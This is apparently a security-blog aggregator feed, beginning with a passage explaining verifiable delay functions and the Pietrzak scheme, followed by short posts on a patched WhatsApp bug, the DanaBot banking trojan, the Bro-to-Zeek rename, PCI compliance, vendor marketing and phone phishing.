Another related problem is electing leaders and validators in proof of stake protocols. In this case it turns out that being able to influence or predict randomness allows a miner to affect when they will be chosen to mine a block. There are a wide variety of techniques for overcoming this issue, such as Ouroboros’s verifiable secret-sharing scheme. However, they all suffer from the same pitfall: a non-colluding honest majority must be present.

In both of the above scenarios it is easy for attackers to see how different inputs affect the result of a pseudorandom number generator. This led Boneh, et al. to define verifiable delay functions (VDF’s). VDF’s are functions that require a moderate amount of sequential computation to evaluate, but once a solution is found, it is easy for anyone to verify that it is correct. Think of VDF’s as a time delay imposed on the output of some pseudorandom generator. This delay prevents malicious actors from influencing the output of the pseudorandom generator, since all inputs will be finalized before anyone can finish computing the VDF.

When used for leader selection, VDF’s offer a substantial improvement over verifiable random functions. Instead of requiring a non-colluding honest majority, VDF-based leader selection only requires the presence of any honest participant. This added robustness is due to the fact that no amount of parallelism will speed up the VDF, and any non-malicious actor can easily verify anyone else’s claimed VDF output is accurate.

VDF Definitions

Given a delay time t, a verifiable delay function f must be both

  1. Sequential: anyone can compute f(x) in t sequential steps, but no adversary with a large number of processors can distinguish the output of f(x) from random in significantly fewer steps
  2. Efficiently verifiable: Given the output y, any observer can verify that y = f(x) in a short amount of time (specifically log(t)).

In other words, a VDF is a function which takes exponentially more time to compute (even on a highly parallel processor) than it does to verify on a single processor. Also, the probability of a verifier accepting a false VDF output must be extremely small (chosen by a security parameter λ during initialization). The condition that no one can distinguish the output of f(x) from random until the final result is reached is essential. Suppose we are running a lottery where users submit 16-bit integers and the winning number is determined by giving a seed to a VDF that takes 20 min to compute. If an adversary can learn 4 bits of the VDF output after only 1 min of VDF computation, then they might be able to alter their submission and boost their chance of success by a factor of 16!

Before jumping into VDF constructions, let’s examine why an “obvious” but incorrect approach to this problem fails. One such approach would be repeated hashing. If the computation of some hash function h takes t steps to compute, then using f = h(h(...h(x))) as a VDF would certainly satisfy the sequential requirement above. Indeed, it would be impossible to speed this computation up with parallelism since each application of the hash depends entirely on the output of the previous one. However, this does not satisfy the efficiently verifiable requirement of a VDF. Anyone trying to verify that f(x) = y would have to recompute the entire hash chain. We need the evaluation of our VDF to take exponentially more time to compute than to verify.

VDF Candidates

There are currently three candidate constructions that satisfy the VDF requirements. Each one has its own potential downsides. The first was outlined in the original VDF paper by Boneh, et al. and uses injective rational maps. However, evaluating this VDF requires a somewhat large amount of parallel processing, leading the authors to refer to it as a “weak VDF.” Later, Pietrzak and Wesolowski independently arrived at extremely similar constructions based on repeated squaring in groups of unknown order. At a high level, here’s how the Pietrzak scheme works.

  1. To set up the VDF, choose a time parameter T, a finite abelian group G of unknown order, and a hash function H from bytes to elements of G.
  2. Given an input x, let g = H(x) evaluate the VDF by computing y = g2T

The repeated squaring computation is not parallelizable and reveals nothing about the end result until the last squaring. These properties are both due to the fact that we do not know the order of G. That knowledge would allow attackers to use group theory based attacks to speed up the computation.

Now, suppose someone asserts that the output of the VDF is some number z (which may or may not be equal to y). This is equivalent to showing that z = v2(T/2) and v = g2(T/2). Since both of the previous equations have the same exponent, they can be verified simultaneously by checking a random linear combination, e.g., vr z = (gr v)2(T/2), for a random r in {1, … , 2λ}(where λ is the security parameter). More formally, the prover and verifier perform the following interactive proof scheme:

  1. The prover computes v = g2(T/2) and sends v to the verifier
  2. The verifier sends a random r in {1, … , 2l} to the prover
  3. Both the prover and verifier compute g1 = gr v and z1 = vr z
  4. The prover and verifier recursively prove that z1 = g12(T/2)

The above scheme can be made non-interactive using a technique called the Fiat-Shamir heuristic. Here, the prover generates a challenge r at each level of the recursion by hashing (G,g,z,T,v) and appending v to the proof. In this scenario the proof contains log2 T elements and requires approximately (1 + 2/√T) T.

Security Analysis of Pietrzak Scheme

The security of Pietrzak’s scheme relies on the the security of the low order assumption: it is computationally infeasible for an adversary to find an element of low order in the group being used by the VDF. To see why finding an element of low order breaks the scheme, first assume that a malicious prover Eve found some element m of small order d. Then Eve sends zm to the verifier (where z is the valid output). The invalid output will be accepted with probability 1/d since

  1. When computing the second step of the recursion, we will have the base element g1 = gr v, where v = g2T/2 m, and need to show that g1T/2 = vr(zm)
  2. The m term on the left hand side is mT/2
  3. The m term on the right hand side is mr+1
  4. Since m has order d, these two will be equal when r+1 = T/2 mod d, which happens with probability 1/d

To see a full proof of why the low order assumption is both necessary and sufficient to show Pietrzak’s scheme is sound, see Boneh’s survey of recent VDF constructions.

The security analysis assumes that one can easily generate a group of unknown order that satisfies the low order assumption. We will see below that there are not groups currently known to satisfy these constraints that are amenable to a trustless setup, i.e., a setup where there is no party who can subvert the VDF protocol.

For example, let’s try to use everyone’s favorite family of groups: the integers modulo the product of two large primes (RSA groups). These groups have unknown order, since finding the order requires factoring a large integer. However, they do not satisfy the low order assumption. Indeed, the element -1 is always of order 2. This situation can be remedied by taking the quotient of an RSA group G by the subgroup {1,-1}. In fact, if the modulus of G is a product of strong primes (primes such that p-1/ 2 is also prime), then after taking the aforementioned quotient there are no elements of low order other than 1.

This analysis implies that RSA groups are secure for Pietrzak’s VDF, but there’s a problem. To generate an RSA group, someone has to know the factorization of the modulus N. Devising a trustless RSA group selection protocol–-where no one knows the factorization of the modulus N–-is therefore an interesting and important open problem in this area.

Another avenue of work towards instantiating Pietrzak’s scheme involves using the class group of an imaginary quadratic number field. This family of groups does not suffer from the above issue where selection requires a trusted third party. Simply choosing a large negative prime (with several caveats) will generate a group whose order is computationally infeasible to determine even for the person who chose the prime. However, unlike RSA groups, the difficulty of finding low-order elements in class groups of quadratic number fields is not well studied and would require more investigation before any such scheme could be used.

State of VDFs and Open Problems

As mentioned in the previous section, both the Pietrzak and Wesolowski schemes rely on generating a group of unknown order. Doing so without a trusted party is difficult in the case of RSA groups, but class groups seem to be a somewhat promising avenue of work. Furthermore, the Wesolowski scheme assumes the existence of groups that satisfy something called the adaptive root assumption, which is not well studied in the mathematical literature. There are many other open problems in this area, including constructing quantum resistant VDFs, and the potential for ASICs to ruin the security guarantees of VDF constructions in practice.

As for industry adoption of VDF’s, several companies in the blockchain space are trying to use VDF’s for consensus algorithms. Chia, for example, uses the repeated squaring technique outlined above, and is currently running a competition for the fastest implementation of this scheme. The Ethereum Foundation also appears to be developing a pseudorandom number generator that combines RANDAO with VDF’s. While both are very exciting projects that will be hugely beneficial to the blockchain community, this remains a very young area of research. Take any claim of security with a grain of salt.





Trail of Bits Blog

[Untitled]: IT が「ゼロトラスト」に注目している理由

複雑な環境に埋もれている SOC は今、セキュリティの強化に威力を発揮する統合ソリューションに熱い視線を送っています。
Publish to Facebook: 
No

当ブログの以前の記事でも指摘したように、クラウドとモバイルが主流となった今、セキュリティの範囲は不明瞭になってきました。

企業情報の保護を、ファイアウォールだけに頼ることはできません。あまりにも多くのデータが飛び交っており、クラウドとの間を行き来するデータと、ファイアウォールの内側にとどまるデータの量はほとんど変わらなくなってきたからです。そのため、企業各社はさまざまな経路からしかけられる攻撃に備えるべく、多面的なアプローチを重視しています。

read more



[Untitled]

Securosis Blog: Disrupt:Ops: What Security Managers Need to Know About Amazon S3 Exposures (1/2)

Posted under:

As we spin up Disrupt:OPS we are beginning to post cloud-specific content over there, mixing theory with practical how-to guidance. Not to worry! We have plenty of content still planned for Securosis. But we haven’t added any staff at Securosis so there is only so much we can write. In the meantime, linking to non-product posts from Securosis should help ensure you don’t lose sleep over missing even a single cloud-related blog entry.

So here’s #1 from the Disrupt:Ops hit parade!

What Security Managers Need to Know About Amazon S3 Exposures (1/2)

The accidental (or deliberate) exposure of sensitive data on Amazon S3 is one of those deceptively complex issues. On the surface it seems entirely simple to avoid, yet despite wide awareness we see a constant stream of public exposures and embarrassments, combined with a healthy dollop of misunderstanding and victim blaming.

- Rich (0) Comments Subscribe to our daily email digest

Securosis Blog

E Hacking News – Latest Hacker News and IT Security News: Whatsapp Fixes Video Call Triggered Exploit which Allowed Accounts Intrusion



A potentially serious flaw that put users in a vulnerable configuration during video calls on Whatsapp has been fixed by the service providers. 

The bug allowed hijackers to hijack the app and subsequently the accounts of the users, both on iOS and Android. It left them unarmed against the attack as soon as they answered the calls. 

When the hijacker transmits a malformed RTP packet to a potential victim, heap corruption could occur - 
referenced from a bug report by Natalie Silvanovich, a security researcher with Google’s Project Zero security research team. 

Dissecting the execution, Natalie in the bug report says, "Heap corruption can occur when the WhatsApp mobile application receives a malformed RTP packet," She adds, "This issue can occur when a WhatsApp user accepts a call from a malicious peer. It affects both the Android and iPhone clients."

As the usage of RTP which stands for Realtime Transport Protocol is commonly shared by both the iOS and Android versions of the messaging app, it made both the platforms vulnerable to the hijack whereas, Whatsapp Web doesn't succumb to the attack as it uses WebRTC for video calls. 

Notably, Silvanovich spotted the exploit a month earlier, but the reported vulnerabilities came into public domain only once a fix was devised. The flaws were patched on October 3rd and September 28th for iOS and Android respectively. 
In the wake of bug being fixed, to be on an even safer side users are advised to have their apps updated to the latest version available for iOS and Android. 




E Hacking News - Latest Hacker News and IT Security News

Professionally Evil Insights: Not Just Another Notch in Your Belt: Organizational Challenges of PCI Compliance

As an account manager in the world of security, I am constantly confronted with questions surrounding PCI compliance and the challenges organizations face with ensuring proper controls are in place, and all requirements met.  If we get down to the core of the issue, the reality is many organizations either don’t have the budget or resources to build out a mature security program that meets PCI DSS standards, or they don’t care enough about addressing security concerns until something bad happens.  Often times, that something bad ends up being catastrophic to the business, and we, as an industry, tend to be too reactive when we should be getting out in front of these issues.   

PCI DSS was created in an effort to motivate organizations to work toward creating a more secure payment process to thwart attacks from unauthorized users.  From the actual debit/credit transaction, to the storing of card data and everything in between, PCI was supposed to be the driving force behind businesses becoming more proactive and vigilant, but almost 15 years later, far too many organizations are still falling short.  

Contrary to popular belief, working toward PCI compliance is not simply a matter of checking a box or adding another notch in your belt; it’s an ongoing process, and while it can be challenging, your business will be better off for taking the necessary steps in doing so.  Secure Ideas works tirelessly to assist organizations in better understanding what is required of them, what steps are needed to reach PCI DSS compliance, and, through a collaborative approach based on years of experience, how to become more resilient to attacks.

Because PCI DSS is not law, the only way to truly compel organizations to work toward compliance is to levy punitive fines or take away the ability to accept cards for those that refuse to comply.  Until recently, the potential for fines wasn’t much of a concern for organizations, and the inconvenience of dealing with PCI was enough for many organizations to ignore it entirely. Fortunately, we’re now at a point that fines are being assessed with more frequency, and failing to comply will soon be too much of a cost to disregard, thus motivating organizations to address their shortcomings.   

While we can sift through the extensive list of controls and requirements that are clearly outlined, if organizations are actively trying to sidestep PCI DSS rather than adhere to or work toward compliance, then we’re not addressing the issue at hand and that is a blatant disregard for proper security controls.  Secure Ideas can help navigate your business through the requirements of PCI, but the burden rests on the shoulders of those same organizations to not only reach but exceed the bare minimum.

At the end of the day, the goal is keeping sensitive data out of the hands of malicious persons, and with new technology and things changing daily, we must be more vigilant than ever.  Secure Ideas recognizes the challenges of attaining compliance, and that is why we work hand in hand with clients to fully understand the requirements of PCI DSS, and how it benefits an organization to comply.



Professionally Evil Insights

Bro Blog: Renaming the Bro Project

More than 20 years ago I chose the name "Bro" as "an Orwellian reminder that monitoring comes hand in hand with the potential for privacy violations", as the original Bro paper put it. Today that warning is needed more than ever ... but it's clear that now the name "Bro" is alas much more of a distraction than a reminder.

On the Leadership Team of the Bro Project, we heard clear concerns from the Bro community that the name "Bro" has taken on strongly negative connotations, such as "Bro culture". These send a sharp, anti-inclusive - and wholly unintended and undesirable - message to those who might use Bro. The problems were significant enough that during BroCon community sessions, several people have mentioned substantial difficulties in getting their upper management to even consider using open-source software with such a seemingly ill-chosen, off-putting name.

Accordingly, in 2017 the Leadership Team undertook to find a new name for the project. We solicited suggestions for new names from the Bro community, receiving several hundred that covered a wide range of sensibilities and rationales. The LT extensively discussed the candidates internally but was unable to come close to a consensus on a satisfactory choice. Names that some LT members quite liked, others found quite deficient. This processed proved particularly hard because some well-liked names had trademark issues and such.

Given that impasse, the LT engaged with a professional naming/branding consultancy to identify other possible names. The process elicited reflection on just what we would like the name to convey, which included notions of insight/visibility, soundness, flexibility, and Bro's heritage.

As the process proceeded, a number of LT members identified their fondness for quirky, pithy names for open-source projects. One name in particular dates all the way back to the very beginning of Bro in 1995 at the Lawrence Berkeley National Laboratory: Zeek. At LBL, the production Bro monitoring ran as a pseudo-user named "zeek" - this included both running the Bro process itself, and also the batch jobs and parallel tcpdump captures used to ensure robust 24x7 operation - a usage that continued for decades.

Why Zeek? The name was inspired by Gary Larson's use of Zeek characters in various "The Far Side" cartoons. We were big Far Side fans at LBL!

As Bro's originator, I have to say that I find switching the system's name to Zeek not only timely, but - in its quirkiness and history - endearing. I am thrilled that the Leadership Team identified and subsequently strongly backed the choice. (It was great, too, to find that we could secure the domain zeek.org.)

The name "Bro" offered numerous opportunities for modest-but-memorable wordplay, such as referring to the project's "Broadmap", beginning conferences with a "Broverview", and coining the term "brogrammer". We've only begun exploring the possibilities with Zeek. However, the speed with which we readily found our first slogan holds promise in this regard. In looking for a new name, we had particularly identified wanting to find one that underscores the system's ability to provide deep insight into network traffic. We put that goal aside for our final selection. But shortly after we settled on our choice, a project member offered:

Zeek, and ye shall find!

Bro Blog

liquid thoughts: Tools For Thought. The Torch (Panel Intro Propsal 11 Oct)

Proposal for introduction to a panel discussion on the 9th of December to celebrate Doug Engelbart’s Demo’s 50th anniversary. This introduction would be shared with the panelists beforehand so that they could have pre-thought-through and written 1 min notes:

Our dear friend Doug’s passion was to augment how we solve urgent problems together.

augmentation

In order to do this he had the great early insight that we should use computers to their full extent because computers allow us to manipulate symbols. This was a great insight, and it was made even more powerful by his paradigm, the way he looked at it: Not simply passive and easy to use, not as AI constructs to do our work for us, but to augment our intellect and the way we work together.

shining a light on the future

He did not think that any one person or group could ever design the ultimate augmentation system. The man who practically invented all of the computer interactions we use today was well aware of his own lack of vision. This is extraordinary.

He used the illustration of shining a torch into the distance. He thought we should build the most powerful torch to see as far as we could–that is to say–we should build the most powerful augmentation systems we could–and then we should use them to see how they really worked really live in them–and use that experience to build yet more powerful systems.

Systems to augment our ability to solve urgent, complex problems collectively–to build systems to enable a deeper literacy, a deeper engagement with our knowledge–and with each other.

This is not an engineering problem. This is a whole–humanity problem.

first half

I ask the panel here today to start with a 1 min intro of something they feel we can power our torch with right now; what are the easy, low hanging fruit (to mix metaphors)? What can be done with relatively little time and money to increase the power of the knowledge worker–a term once remote and fancy and which now covers basically everyone?

second half

At the half way mark I will ask us to consider the distant future. If we agree on a goal of truly augmenting humanity to have rich and powerful interactions (which we do, since we have been in discussion before this panel), what kind of tools should we aim to build–and more importantly, how should we go about building them and what infrastructures will need to be crated to support them?



liquid thoughts

E Hacking News – Latest Hacker News and IT Security News: BrahMos Breach With Coded Games: Dispatching Sensitive Information Across The Border?


Recently, an aerospace engineer, Nishant Agrawal was taken to be responsible for the leakage of majorly sensitive information. Apparently, the harvested information was meant for some Pakistani based operators.

The National Institute of Technology’s former student who also worked as a research intern in IIT Roorkee initially, according to Anti-Terrorism Squad, was contacted by two women who pretended to offer him a job in Canada and a handsome salary and ever since then he had been on terms with them.  The IP addresses and accounts were confirmed as that from Pakistan. The matter is still being investigated and concrete statements can’t be made as of now.

Nishant worked as the head of the hydraulics-pneumatics and warhead integration and had also been awarded by the Young Scientist Award quite recently. He had been working in Nagpur for the past one year. ATS found confidential information on Agrawal’s laptop that holds relevance with security and defense. Despite going through strenuous questioning, Nishant could not help the agents make head or tail of the presence of such sensitive information on his device. 

The affair of sharing information had been on for the past two years.
Being wiser to a lot, Agrawal was the best person to provide internal information regarding the latest technology that’s been recently developed by India and Russia, collectively. The sharing of the data was not just restricted to ISI but had reached to other foreign countries as well. The aforementioned “information” is related to seekers and is about the seeker technology that helps in determining the accuracy of any missile.  


The cleverest part about the entire scenario is that Nishant, under the veil of a “Coded game” used to transport the precarious information to the handlers.  As per the ATS, once the gaming codes are decoded there is a fair chance of decrypting the aforementioned information. 



E Hacking News - Latest Hacker News and IT Security News

Blog | Avast EN: The MSP Guide to Building Your Managed Security Services: Best Practices for Marketing | Avast Business

There’s an ever-growing need for digital protection in today’s world, and, when delivered the right way, managed security services can provide this security while paving the road to success for any MSP. In our blog series centered around The MSP Guide to Building Your Managed Security Services, we discussed the smartest and most advantageous ways to define and bundle MSP services in Part 1 and key pricing strategies in Part 2. In our third and final post, we’re touching on MSP best practices for marketing success.



Blog | Avast EN

Blog | Avast EN: Avast pumps protection, performance, and privacy in 2019 | Avast

The tech world evolves. The ones who wear black hats get smarter, and the ones who wear white hats get even smarter. Using AI, machine learning, and the big data of our vast network, we’re proud to be forerunners in the latter category, staying a step ahead of the cybercrime underworld. We not only test our products rigorously in our own labs, but we submit them for objective third-party evaluations to learn where we can improve. Reviews have been favorable throughout 2018 and we continue to offer the best free and most competitive and feature rich antivirus products on the market.

Avast-av-test-top-product-awardAvast Free Antivirus 2018 for Windows received Top Product from AV-Test.  The Avast 2019 product line-up adds on more features.



Blog | Avast EN

Data Security Blog | Thales eSecurity: A new era for customer data – could security be ‘the new green’ for businesses?

There was a tipping point not so long ago in the realm of environmental responsibility for businesses. For some time, curbing emissions and waste was simply something the corporate world did if it had to, in order to comply with governmental regulations and avoid a hefty fine. Now, driven by a few ‘leading-edge’ companies who chose to take the plunge, being ‘lean and green’ is widely agreed to improve profitability and enhance competitiveness.

I now see cyber security – and more specifically, data security – positioned at the edge of a similar tipping point. Driven by the introduction of the General Data Protection Regulation (GDPR) and heightened by constantly evolving demands, consumers are changing their purchasing habits. With this only set to continue, there is every chance we may soon see organisations using data security to seize a competitive advantage.

GDPR: to help or hinder?

In the run up to its implementation earlier this year, the GDPR scare stories came thick and fast, with the majority of exposure playing on fears of enormous financial penalties or reputation-destroying data breaches.

While some businesses have undoubtedly been more cautious of the impact of their irresponsible data practices than others have, the regulation has arguably created a damaging approach to security. Many organisations recognise data security as something that can’t be ignored, but still invest in it sparingly and reluctantly.

While it’s not difficult to understand the psychology at play here – it’s hard for any of us to get excited about spending money when we feel we are forced to do so – that doesn’t make it any less of a priority. Think TV licenses and car insurance, for example.

However, the narrative is set to change. There has never been more public awareness around the importance of data security – between the Cambridge Analytica scandal and hundreds of GDPR ‘opt-out’ notifications – the topic has been on our front pages and at the top of our inboxes for a while.

Indeed, data and information security has truly emerged into the public’s collective consciousness as we’ve seen in recent examples such as the reporting on cyber hacking group, Fancy Bear, where the group had tried to steal data from political organisations, including the International Republican Institute and the Hudson Institute think tanks.

A personal interest

Cybersecurity and personal data security has now become so important it’s gone from something consumers simply know about, to something consumers actually care about.

What’s more, we’re increasingly seeing evidence that consumer buying habits are directly influenced by how closely a company will safeguard their personal data. In fact, Gartner recently predicted that by 2021, organisations that protect their customers’ privacy will generate 20 per cent more revenue than those who don’t. So, similarly to environmental issues, data security is shifting from a box-ticking exercise to something that demonstrably drives sales.

IBM has gone even further, with its consumer survey revealing that 75 per cent will not buy from a company – no matter how great the products are – if they don’t trust the company to protect their data. It’s intriguing to see which companies will be the first to truly flip the message to customers. As mentioned earlier, corporations could even harness positive data security practices to seize a competitive edge in the market.

On a business-to-consumer level, we’ve already observed retailers utilising GDPR as an opportunity for innovation and further customer engagement. In an article for Data IQ, David Reed correctly explained, “GDPR is the perfect opportunity for businesses to rethink their approach to data and the enhanced customer relationships and experiences it allows.” We can see that through brands that are using GDPR as an opportunity to innovate and are now benefitting from stronger relationships with their customers, and are now more engaged with their marketing programmes as a direct result.

Ethical incentives

Similarly to the recent war on plastic – which was catapulted into the public view thanks to documentaries by Sir David Attenborough – it could be possible for responsible data use and storage to become mainstream. Arguably, responsible cybersecurity practices could become part of wider marketing plans for companies, especially as we see demographics like millennials who are broadly looking for opportunities to do good in the world, not just financially.

According to not-for-profit consultancy Ethical Consumer, the ethical products and services sector has grown by more than £40bn since 2008, with households spending an average of £1,263 on ethical goods last year. And, what’s to say that in the wake of Cambridge Analytica and other significant data breaches from this year, there isn’t a gap in the market for ethical data marketing? Indeed, there could be an opportunity for driving revenue, trust and engagement with customers, akin to the recommended ban on single-use plastics.

Indeed, the plastics initiative is part of a wider green objective that businesses have harnessed, and as we found with ‘green business’, it only takes one or two trailblazers to revolutionise the course of an entire industry. The same will soon be said about data security, with evolving regulations and industry competition encouraging organisations to think differently about data best practice or risk lagging behind.

The post A new era for customer data – could security be ‘the new green’ for businesses? appeared first on Data Security Blog | Thales eSecurity.



Data Security Blog | Thales eSecurity

Adobe Product Security Incident Response Team (PSIRT) Blog: Security Bulletins Posted

Adobe has published security bulletins for Adobe Digital Editions (APSB18-27), Adobe Experience Manager (APSB18-36), Adobe Framemaker (APSB18-37) and Adobe Technical Communications Suite (APSB18-38). Adobe recommends users update their product installations to the latest versions using the instructions referenced in the relevant bulletin.

This posting is provided “AS IS” with no warranties and confers no rights.



Adobe Product Security Incident Response Team (PSIRT) Blog

SolarWinds MSP Blog: Customer Success—Using Your Data to Make Organizational Change

In this series of blogs on developing your customer success program, we’ve looked at how you understand and gather data on churn, how you report on customer losses, and how you find out how your customers really feel about your product through tracking your Net Promoter Score (NPS). To make this a valuable exercise for your company, it’s crucial that you also take this insight and feed it back into the way your organization works—companies that do this can dramatically improve their retention rates.

Read More

SolarWinds MSP Blog

SecuriTeam Blogs: SSD Advisory – Firefox Information Leak

Vulnerabilities Summary A vulnerability where the JavaScript JIT compiler inlines Array.prototype.push with multiple arguments that results in the stack pointer being off by 8 bytes after a bailout. This leaks a memory address to the calling function which can be used as part of an exploit inside the sandboxed content process. Vendor Response “Security vulnerabilities … Continue reading SSD Advisory – Firefox Information Leak

SecuriTeam Blogs

The Ethical Hacker Network: Webinar: Blockchain Hacking for Investigating Cryptocurrencies on Oct 24 2018

Register Now to Learn Blockchain Hacking Step-by-Step!

Nick Furneaux, forensics trainer, investigator & author of "Investigating Cryptocurrencies" takes you through a journey of code and tools to unpick the movement of illegal funds through the blockchain during this fascinating, FREE EH-Net Live! webinar on Wednesday October 24, 2018 at 1:00 PM US Eastern. Join us live to learn how to win free copies of his book!

The post Webinar: Blockchain Hacking for Investigating Cryptocurrencies on Oct 24 2018 appeared first on The Ethical Hacker Network.



The Ethical Hacker Network

Data Security Blog | Thales eSecurity: Data-Centric Security and Big Data

As Cybersecurity continues to be heavily focused on solving the problem of attacks against software vulnerabilities and system access, one potential silver bullet in the data breach equation remains out of the limelight. Enter data-centric security… a set of technologies that lower the value of data through encryption, tokenization, data masking and access control methods. Data-centric security has been around for years but doesn’t receive the same level of media coverage, hype or attention that other security technologies do. Perhaps, it should.

Data-Centric Security and Big Data

When you think about what the average enterprise needs to do to protect against attacks on software vulnerabilities and system access, it is daunting. The sad news is that most companies that have deployed reasonable cybersecurity countermeasures have had an unwanted visitor perusing their systems at some point. It’s not a matter of if your systems will be breached but a matter of when, how and at what cost. So let’s assume from this point forward that there is no way to keep intruders out. Better yet, let’s assume that everyone already on the inside of an organization is a threat to sensitive data within the systems there. It’s called the “Zero-Trust Model” and nothing supports it like data-centric security since the methods used can render data useless if it is ever stolen or removed from the enterprise.

The Big Data Conundrum

To better understand the challenges that today’s enterprises face protecting their data, you need to take a look at what is happening to data on a global scale. While consumers were largely responsible for data growth in prior years, by 2025 worldwide data is expected to increase another tenfold and enterprises will have created 60 percent of it1.

Big data technologies like Greenplum, Hadoop and Teradata are quickly being adopted to help facilitate the storage and access to all this newly created data. Further driving the adoption of big data technologies are applications like analytics, AI, machine learning and IoT which are all fueling the creation and growth of new data lakes. Adding to the challenge is the inherent “open” nature of big data technologies which use standard IP protocols such as HTTP under the hood and provide no native features for encrypting or obfuscating the data they store. In short, these technologies are vulnerable, especially to insiders who have unfettered, root-level access.

Luckily, data-centric security gives enterprises an effective option for protecting data within a big data environment. Key features of data-centric security include:

  • Transparent Data Encryption – Transparent data encryption provides an excellent path for protection of structured data within certain data stores like Hadoop and unstructured data in files. Transparent encryption can typically be implemented without changes to application code or databases that present the quickest path to implementation for most enterprises.
  • Application Layer Encryption or Tokenization – Application layer data security provides the highest level of security as it can be implemented high up in the software stack to protect data both in transit and at rest. Application layer data protection typically involves changes to application or database code to implement.
  • Strong Access Controls – By tightly controlling the permissions for which users have access to cryptographic keys or the data replaced by tokens, it is possible to restrict data access to anyone inside an organization including root-level administrators. This is essential for supporting the Zero-Trust Model that was mentioned earlier.
  • Strong Encryption Key Management – Any worthy data security solution using cryptography should include strong key management and a separation of duties between the systems applying that data protection and those performing key management. Good key management systems will also provide the ability to leverage a hardware-based root of trust for key creation and storage.

If you are part of an enterprise that is in the process of implementing big data technologies or if your enterprise already has mature big data environments, you should consider deploying a data-centric security solution. Effective data-centric security solutions are the only reasonable path to realizing a Zero-Trust Model. Without a method of obfuscating sensitive data within ever-growing data stores and keeping unfettered access out of the hands of insiders, the data breach problem will continue to grow, unchecked.

To learn more, visit our website or see us next week, October 14-19, at Teradata Analytics Universe, booth 105 in Las Vegas.

  1. “The value of data: forecast to grow 10-fold by 2025” – Information Age, April 5, 2017

The post Data-Centric Security and Big Data appeared first on Data Security Blog | Thales eSecurity.



Data Security Blog | Thales eSecurity

E Hacking News – Latest Hacker News and IT Security News: Cloned Profile Hoax on Facebook makes a comeback



                                     

In the wake of a hoax, which is doing rounds saying that the sender has received another friend request from the recipient, Facebook officials confirm the claims of the accounts being cloned as an attempt to befool the users.


The hoax which went viral on Sunday is woven around a duplicate friend request message that asks the receiver to forward it to their friends.
 

The message that had a terrific number of Facebook users troubled to an extent that the reports of the same saw an upsurge lately, reads "Hi I actually got another friend request from you yesterday...which I ignored so you may want to check your account.

'Hold your finger on the message until the forward button appears...then hit forward and all the people you want to forward too...I had to do the people individually. Good Luck!'


Officials of the social media giant said that there's no evidence of any virus being linked to the scam messages or the dissemination of it, the cause of the same is said to be based in fear.


It takes the form of a "chain mail" type of notice, referenced from a spokesperson's remarks, he further said, 'We've heard that some people are seeing posts or messages about accounts being cloned on Facebook. He added, 'We haven't seen an increase in incoming reports of impersonation (cloned accounts).


A cloning scam is when someone creates an alternative Id of a user and puts the pictures and data he stole from the original ID of the victim onto the duplicate account. This kind of identity assault doesn't require access to the victim's original ID. Then, in a calculated attempt to pile up more personal data, the criminal sends friend requests to the victim's original friends (via friends list).


To ensure their safety, users can go and search their name on Facebook, if accounts other than your original one having a similar display and details make it to the search results, odds are in the favor of your account being cloned.


Such cases are to be immediately reported to the Facebook, requesting a removal of the duplicate account which will be taken care of within 24 hours. 




E Hacking News - Latest Hacker News and IT Security News

News Tom’s Guide: Alexa App Just Got A Big Overhaul

Amazon's Alexa app has looked the same for a long time. But on Friday, Amazon announced that its voice assistant is getting a makeover. The app, which previously wore a utilitarian black, dark blue, and white interface, has integrated more colors, inclu

News Tom's Guide

E Hacking News – Latest Hacker News and IT Security News: DanaBot Trojan: Another Banking Malware

DanaBot Trojan: Another Banking Malware


After already having wreaked tremendous havoc in regions of Australia and Europe the DanaBot Trojan has further spread its tentacles across the banks of the United States.


According to the new developments in the field, it was found out that, initially this banking Trojan was restricted to only a few parts of the world. The modular Trojan which is written in Delphi tries to harvest the account information and credentials from the online banking sites.

It completes its task with the help of various means and ways including clicking screenshots automatically while the screen is active and logging keystrokes on the device. The harvested data is amalgamated and sent to get further accessed, to the central server which acts as a controlling and command center.

A solo group was in charge of the DanaBot when it was unveiled for the first time, the major preys being Australian banks. With the passage of time, more players entered the game of the Trojan attacks. In fact, the latest campaigns are being released lately using different IDs.

As word from the sources has it, possibly, DanaBot is marketed as a fraction of a bigger system, so as to invite people to either rent the malicious Trojan from the developer or to share profits.

A campaign which was identified by one of the sources was spreading in the North American territory through something that’s called a “Malspasm”. The malspasm replicates the functioning of a digital fax from an organization named “eFax” stating that the receiver must click on it download them it up.

 Once downloaded, a malicious word document opens up prompting the users to press the button with “Enable Content” mentioned on it. The click would lead to the starting up of the word macros and an instant installment and download of Hancitor on the target’s device.  Hancitor would further download DanaBot and other malware, on the computer.

Security researchers in the west say that TD Bank, J P Morgan Chase and Bank of America, to name a few are the banks that have been the primary sufferers of this severe DanaBot attack.

As of now, there are nine separate distributors of the aforementioned Trojan. These 9 players could be identified via their “affiliate IDs”.

 Most of the times, a single distributor dispenses the malware to a specific area. Australia had been the target of two distinct affiliate IDs with each one of them following their own atypical ways, encompassing, namely, installations via Hancitor malware, web injections and etc.

DanaBot has behaved quite analogical with relation to its commands and control servers to another ransom-ware which is quite well-known. This is giving rise to suspicious statements which are stating DanaBot to be a next-generation ransom-ware.

In a statement, one of the sources insinuated that this latest banking Trojan is quite set on binging on juicy bank details of users and reportedly is even an evolved version of CryptXXX which is an infamous malicious ransom-ware.
 



E Hacking News - Latest Hacker News and IT Security News

E Hacking News – Latest Hacker News and IT Security News: Phone Phishing Level Ups: Smart Slaves to Digital Wizardry


The human race has developed an unfathomable affinity towards technology and consequently is convinced that we have become smart enough to no longer be susceptible to the scams and highly innovative cyber attacks; however what escapes our notice is that unfortunately, overindulgence in anything has its own repercussions. When you fall prey to an obsolete telephone-based phishing scam, inferences that get drawn are – we are becoming smart slaves to the digital wizardry. Scam artists are paving unprecedented ways for technological complications.
Matt Haughey, the creator of ‘Weblog MetaFilter’ and a writer at Slack has given an account of how he received a call from an 800-number which bore a resemblance to the number his credit union uses. Bearing in mind the rarity of the calls he receives from his credit union, he picked up the last one of three successive calls he got. On the other end of the call, a female was explaining to him that the credit union had blocked two phony-looking charges in Ohio that was made to his ATM card. She continued the conversation as she read him the last four digits of the card that belonged to him and needless to say, it checked out.
Haughey returned that he is going to need a replacement card urgently as he has a travel planned to California. Instantly, the voice on the other end said that he could keep his card and any future charges that weren’t made in either Oregon or California would simply be blocked by the credit union.
The piece of information- that bank just called to inform him about the freezing of his card and then spontaneously launched into another accent and said that he could keep it open for his upcoming trip, wasn’t bought by Haughey and he happened to sense something that was off. He pacified his concern by assuring himself that it was a favor that the caller subjected him to. 
